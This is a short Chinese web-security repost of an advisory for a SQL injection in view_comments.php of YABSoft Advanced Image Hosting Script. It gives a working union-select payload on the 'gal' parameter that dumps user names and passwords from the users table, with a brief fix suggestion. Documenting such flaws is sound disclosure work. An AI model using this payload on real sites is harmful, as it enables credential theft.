好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

YABSoft Advanced Image Hosting Script SQL注射 - 网站安全

标题: AIHS (Advanced Image Hosting Script) SQL Injection Vulnerability 作者: Robert Cooper HdhCmsTest2cto测试数据 软件地址: http://yabsoft测试数据/ 测试平台: [ Linux /Windows 7]   #缺陷文件:   view_comments.php   缺陷处:   view_comments.php?gal=[gallery id]     测试示例:   HdhCmsTest2cto测试数据 /view_comments.php?gal=109 union all select 1,2,3,4,5,6,7,group_concat(id,0x3a,user,0x3a,pass,0x0a) FROM users--   HdhCmsTest2cto测试数据提供修复方案:   过滤view_comments.php页面gal参数输入     # Shouts to the Belegit crew

查看更多关于YABSoft Advanced Image Hosting Script SQL注射 - 网站安全的详细内容...

  阅读:44次